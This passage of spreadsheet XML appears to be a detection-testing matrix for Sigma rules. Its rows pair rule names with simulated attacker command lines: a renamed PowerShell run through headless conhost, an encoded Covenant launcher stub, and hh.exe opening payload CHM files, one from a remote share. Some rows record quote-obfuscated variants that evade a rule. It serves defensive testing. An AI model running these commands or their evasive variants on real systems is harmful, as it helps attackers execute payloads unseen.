      <c r="C3465" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D3465" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E3465" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\sys.exe &amp;&amp; conhost.exe --HeADLeSS C:\Temp\sys.exe /"Command" "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F3465" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3465" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3465" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3465" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J3465" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3465" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3466" ht="15.75" customHeight="1" s="42">
      <c r="A3466" s="44" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B3466" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C3466" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D3466" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E3466" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\sys.exe &amp;&amp; conhost.exe --hEAdlESS C:\Temp\sys.exe -CommAnd "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F3466" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3466" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3466" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3466" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J3466" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3466" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3467" ht="15.75" customHeight="1" s="42">
      <c r="A3467" s="44" t="n"/>
      <c r="B3467" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C3467" s="44" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D3467" s="44" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E3467" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -e cwB2ACAAbwAgA...</t>
        </is>
      </c>
      <c r="F3467" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3467" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3467" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3467" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J3467" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3467" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3468" ht="15.75" customHeight="1" s="42">
      <c r="A3468" s="44" t="n"/>
      <c r="B3468" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C3468" s="44" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D3468" s="44" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E3468" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -E cwB2ACAAbwAgA...</t>
        </is>
      </c>
      <c r="F3468" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3468" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3468" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3468" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J3468" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3468" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3469" ht="15.75" customHeight="1" s="42">
      <c r="A3469" s="44" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B3469" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3469" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3469" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3469" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\malicious.chm</t>
        </is>
      </c>
      <c r="F3469" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3469" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3469" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3469" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3469" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3469" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3470" ht="15.75" customHeight="1" s="42">
      <c r="A3470" s="43" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B3470" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3470" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3470" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3470" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\help_document.chm</t>
        </is>
      </c>
      <c r="F3470" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3470" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3470" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3470" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3470" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3470" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3471" ht="15.75" customHeight="1" s="42">
      <c r="A3471" s="44" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B3471" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3471" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3471" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3471" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\APPDAT~1\Local\Temp\malicious.chm</t>
        </is>
      </c>
      <c r="F3471" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3471" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3471" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3471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471" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3471" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3472" ht="15.75" customHeight="1" s="42">
      <c r="A3472" s="43" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B3472" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3472" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3472" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3472" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Windows\System32\oobe\msoobe.chm</t>
        </is>
      </c>
      <c r="F3472" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3472" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3472" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3472" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3472" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3472" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3473" ht="15.75" customHeight="1" s="42">
      <c r="A3473" s="43" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B3473" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3473" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3473" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3473" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\document.chm</t>
        </is>
      </c>
      <c r="F3473" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3473" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3473" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3473" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3473" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3473" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3474" ht="15.75" customHeight="1" s="42">
      <c r="A3474" s="43" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B3474" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3474" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3474" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3474" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F3474" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3474" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3474" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3474" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3474" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3474" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3475" ht="15.75" customHeight="1" s="42">
      <c r="A3475" s="43" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B3475" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3475" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3475" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3475" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F3475" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3475" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3475" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3475" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3475" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3475" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3476" ht="15.75" customHeight="1" s="42">
      <c r="A3476" s="43" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B3476" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3476" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3476" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3476" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F3476" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3476" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3476" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3476" s="43" t="n"/>
      <c r="J3476" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3476" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3477" ht="15.75" customHeight="1" s="42">
      <c r="A3477" s="43" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B3477" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3477" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3477" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3477" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F3477" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3477" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3477" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3477" s="44" t="n"/>
      <c r="J3477" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3477" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3478" ht="15.75" customHeight="1" s="42">
      <c r="A3478" s="43" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B3478" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3478" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3478" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3478" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update_help.chm</t>
        </is>
      </c>
      <c r="F3478" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3478" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3478" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3478" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3478" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3478" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3479" ht="15.75" customHeight="1" s="42">
      <c r="A3479" s="43" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B3479" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3479" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3479" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3479" s="43" t="inlineStr">
        <is>
          <t>hh.exe \\192.168.1.100\share\payload.chm</t>
        </is>
      </c>
      <c r="F3479" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3479" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3479" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3479" s="43" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3479" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3479" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3480" ht="15.75" customHeight="1" s="42">
      <c r="A3480" s="44" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B3480" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3480" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3480" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3480" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update.chm</t>
        </is>
      </c>
      <c r="F3480" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3480" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3480" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3480" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3480" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3480" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3481" ht="15.75" customHeight="1" s="42">
      <c r="A3481" s="44" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B3481" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3481" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3481" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3481" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\user\DOWNLO~1\malicious.chm</t>
        </is>
      </c>
      <c r="F3481" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3481" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3481" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3481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481" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3481" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3482" ht="15.75" customHeight="1" s="42">
      <c r="A3482" s="44" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B3482" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3482" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3482" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3482" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\malicious.chm</t>
        </is>
      </c>
      <c r="F3482" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3482" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3482" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3482" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3482" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3482" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3483" ht="15.75" customHeight="1" s="42">
      <c r="A3483" s="44" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B3483" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3483" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3483" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3483" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\help_document.chm</t>
        </is>
      </c>
      <c r="F3483" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3483" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3483" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3483" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3483" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3483" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3484" ht="15.75" customHeight="1" s="42">
      <c r="A3484" s="43" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B3484" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3484" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3484" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3484" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\APPDAT~1\Local\Temp\malicious.chm</t>
        </is>
      </c>
      <c r="F3484" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3484" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3484" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3484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484" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3484" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3485" ht="15.75" customHeight="1" s="42">
      <c r="A3485" s="43" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B3485" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3485" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3485" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3485" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\Windows\System32\oobe\msoobe.chm</t>
        </is>
      </c>
      <c r="F3485" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3485" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3485" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3485" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3485" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3485" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3486" ht="15.75" customHeight="1" s="42">
      <c r="A3486" s="43" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B3486" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3486" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3486" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3486" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\document.chm</t>
        </is>
      </c>
      <c r="F3486" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3486" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3486" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3486" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3486" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3486" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3487" ht="15.75" customHeight="1" s="42">
      <c r="A3487" s="43" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B3487" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3487" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3487" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3487" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F3487" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3487" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3487" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3487" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3487" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3487" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3488" ht="15.75" customHeight="1" s="42">
      <c r="A3488" s="43" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B3488" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3488" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3488" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3488" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F3488" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3488" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3488" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3488" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3488" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3488" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3489" ht="15.75" customHeight="1" s="42">
      <c r="A3489" s="43" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B3489" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3489" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3489" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3489" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F3489" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3489" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3489" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3489" s="43" t="n"/>
      <c r="J3489" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3489" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3490" ht="15.75" customHeight="1" s="42">
      <c r="A3490" s="43" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B3490" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3490" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3490" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3490" s="43" t="inlineStr">
        <is>
          <t>cmd.exe -"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F3490" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3490" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3490" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3490" s="43" t="n"/>
      <c r="J3490" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3490" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3491" ht="15.75" customHeight="1" s="42">
      <c r="A3491" s="43" t="inlineStr">
